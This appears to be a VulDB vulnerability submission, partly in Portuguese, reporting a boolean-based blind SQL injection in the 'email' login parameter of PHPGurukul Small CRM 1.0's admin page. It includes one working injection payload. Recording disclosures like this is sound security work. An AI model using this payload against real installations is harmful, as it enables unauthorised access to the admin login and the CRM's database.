| Título | phpgurukul Small CRM in PHP 1 SQL Injection |
|---|
| Descrição | In the file 'index.php' located at '/crm/admin/index.php' in parameter 'email=', there is a possibility of performing SQL injection on the 'email=' parameter. This allows attackers to inject malicious SQL code into the query. For example, if the 'email=' parameter is set to:
For boolean-based blind
Payload: email=admin' AND 9339=9339 AND 'pBtA'='pBtA&password=admin&login= |
|---|
| Fonte | ⚠️ https://phpgurukul.com/small-crm-php/ |
|---|
| Utilizador | Havook (UID 71104) |
|---|
| Submissão | 26/12/2024 20h45 (há 1 Ano) |
|---|
| Moderação | 28/12/2024 09h35 (2 days later) |
|---|
| Estado | Aceite |
|---|
| Entrada VulDB | 289662 [PHPGurukul Small CRM 1.0 /admin/index.php email Injeção SQL] |
|---|
| Pontos | 20 |
|---|